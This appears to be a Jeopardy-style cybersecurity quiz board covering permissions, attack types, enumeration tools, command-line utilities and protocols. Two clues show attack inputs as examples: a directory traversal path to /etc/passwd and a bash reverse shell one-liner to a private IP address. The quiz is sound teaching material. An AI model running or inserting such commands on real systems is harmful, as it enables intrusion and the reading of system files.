Data Protection
Attack types
Enumeration
Command tools
Misc
100

3 basic Linux permissions


JN

Read, Write, Execute

100

../../../../../../etc/passwd


SD

Directory traversal

100

Term for mapping out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace


FT

Footprinting

100

Windows command line version of task manager


AS

Tasklist

100

Which of the following are threats discovered in live environments that have no current fix or patch?


ZD

Zero day

200

System to configure classification, confidentiality, and privacy rules and policies, log incidents, and compile reports. Can block files from leaving the network


AL

DLP (Data Loss Prevention)

200

Injects malicious code from the client browser in the context of a trusted page


FD

XSS (Cross-site scripting)

200

Tool that uses TCP SYN to scan for host discovery with fingerprinting of active hosts



ZM

NMAP

200

Command to change permissions on Linux


CH

Chmod

200

Email authentication method that uses a digital signature to let the receiver of an email know that the message was sent and authorized by the owner of a domain.


LS

DKIM (DomainKeys Identified Mail)

300

Permission type needed in Microsoft to connect to a folder on a different computer


SA

Share

300

Access a large number of accounts with a few commonly used passwords


EW

Password spraying

300

Command line tool for web app vulnerabilities



MA

Nikto

300

Linux command used to extract text from binary files



QA

Strings

300

Developed by Lockheed Martin. 7-step model for identification and prevention of cyber intrusion activity.


DM

Kill Chain

400

State of data when encrypted on a hard disk. Data at ?


ER

Rest

400

What is this an example of?

bash -i >& /dev/tcp/10.20.100.1/8181 0>&1


vd

Reverse shell

400

Tool by OWASP to identify web application vulnerabilities by proxy


GD

ZAP (Zed Attack Proxy)

400

Command to show open ports on PC


NS

Netstat

400

Term for collection and analysis of publicly available information appearing in print or electronic form


NR

OSINT (Open Source Intelligence)

500

Microsoft tool used on NTFS volumes to encrypt individual files and folders


RD

EFS (Encrypted file system)

500

The attacker tests username and password combinations against multiple online sites


CS

Credential stuffing

500

Term to perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata


SW

Fingerprinting

500

Used to interact with a web server using a command line interface.


WG

Wget or cURL

500

What is the minimum version that should be used for TLS?


GL

1.2
